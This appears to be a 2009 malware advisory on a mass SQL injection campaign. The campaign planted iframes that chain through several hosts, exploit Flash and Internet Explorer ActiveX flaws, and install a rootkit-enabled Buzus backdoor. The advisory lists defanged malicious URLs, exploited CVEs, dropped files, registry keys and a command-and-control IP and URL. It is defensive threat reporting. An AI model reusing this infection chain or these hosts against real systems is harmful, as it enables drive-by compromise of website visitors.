A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.


Infection sequence

Injected iframe - <script src=hxxp://318x.com>
Executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:

1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).

The aa1100.2288.org/htmlasp/dasp/alt.html frame:

• Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
• Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different number)
• If <noscript> it has an href tag that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif

The share.html detects browser type and writes/loads multiple iframes pointing to obfuscated script files located in the same directory (all are javascript regardless of extension). The combined action results in checks for MDAC, OWC10, and various versions of Adobe Flash. Depending on the results, the malcode then delivers one of several possible exploits.

Observed exploits include:

• Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
• MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
• Microsoft Office Web Components vulnerabilities described in MS09-043
• Microsoft video ActiveX vulnerability described in MS09-032
• Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

Successful exploit leads to the silent delivery of hxxp://windowssp.7766.org/down/down.css. The file ‘down.css’ is actually a Win32 executable that is a variant of the Backdoor.Win32.Buzus family of trojans.

Malware description
Threatname: Backdoor.Win32.Buzus.croo
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

Drops the following files to the specified folder:
%UserProfile%\ammxv.drv
%ProgramFiles%\Common Files\Syesm.exe

Modifies the Registry to load when Windows is started:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
DrvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
DrvKiller\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\
DrvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\
DrvKiller\Security

The malware contains a rootkit component which can prevent the dropped files and registry changes from being readily viewable.

Backdoor.Win32.Buzus.croo then attempts to contact 121.14.136.5 via port 80 and sends a POST request to hxxp://dns.winsdown.com.cn/Countdown/count.asp.